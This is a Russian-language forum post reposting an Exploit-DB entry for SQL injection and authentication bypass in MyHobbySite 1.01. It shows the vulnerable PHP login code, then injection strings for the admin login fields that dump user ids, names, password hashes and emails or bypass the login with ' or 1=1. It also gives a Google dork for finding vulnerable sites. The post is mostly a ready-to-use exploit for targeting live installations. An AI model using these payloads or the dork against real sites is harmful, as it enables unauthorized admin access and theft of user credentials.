Exploit MyHobbySite 1.01 - SQL Injection / Authentication Bypass

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14977
Проверка EDB
  1. Пройдено
Автор
YUGJ VN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2010-09-12
MyHobbySite 1.01 - SQL Injection / Authentication Bypass
Код: 
#########################################################################################
# Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability
# Date: 12-09-2010
# Author: YuGj VN
# Email: [email protected]
# Software Link: http://www.myhobbysite.net/index.php?page=15
# Version: v1.01
#########################################################################################

Bug Code:
if (isset($_REQUEST['username']) and isset($_REQUEST['password'])) {
	// Get user info from the dataabse
	$_REQUEST['username'] = trim($_REQUEST['username']);
	$_REQUEST['password'] = trim($_REQUEST['password']);
	$usersettings = @mysql_query("SELECT * FROM " . $CONFIG['database_table_prefix'] . "users WHERE username='$_REQUEST[username]' AND password=md5('$_REQUEST[password]')");
	$usersettings = mysql_fetch_array($usersettings);
	if ($usersettings) {
		$_SESSION['logged_in'] = TRUE;
		$_SESSION['userid'] = $usersettings['id'];
		$_SESSION['user'] = $usersettings['username'];
		$_SESSION['pass'] = $usersettings['password'];
		$_SESSION['email'] = $usersettings['email'];
		$_SESSION['permissions'] = $usersettings['permissions'];
		UpdateLogs($usersettings['username'] . " logged into the Admin CP.");
	} else {
		$failed_login = TRUE;
	}
}

#########################################################################################

Exploit:

link exploit:  http://domain.com/admin/
# Enter in username field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# Enter in password field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# or
# Enter in username field: ' or 1=1-- -
# Enter in password field: ' or 1=1-- -
# 
#
# We can exploit only when magic_quote_gpc = Off
# Google dork: Powered by MyHobbySite 1.01
# 
#
#########################################################################################
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
Ответы
0
Просмотры
942
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Color Prediction Game v1.0 - SQL Injection
Ответы
0
Просмотры
922
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit RosarioSIS 10.8.4 - CSV Injection
Ответы
0
Просмотры
903
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit News Portal v4.0 - SQL Injection (Unauthorized)
Ответы
0
Просмотры
905
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Faculty Evaluation System v1.0 - SQL Injection
Ответы
0
Просмотры
903
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit projectSend r1605 - CSV injection
Ответы
0
Просмотры
882
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Ответы
0
Просмотры
893
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
Ответы
0
Просмотры
906
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MotoCMS Version 3.4.3 - SQL Injection
Ответы
0
Просмотры
903
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Service Provider Management System v1.0 - SQL Injection
Ответы
0
Просмотры
902
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу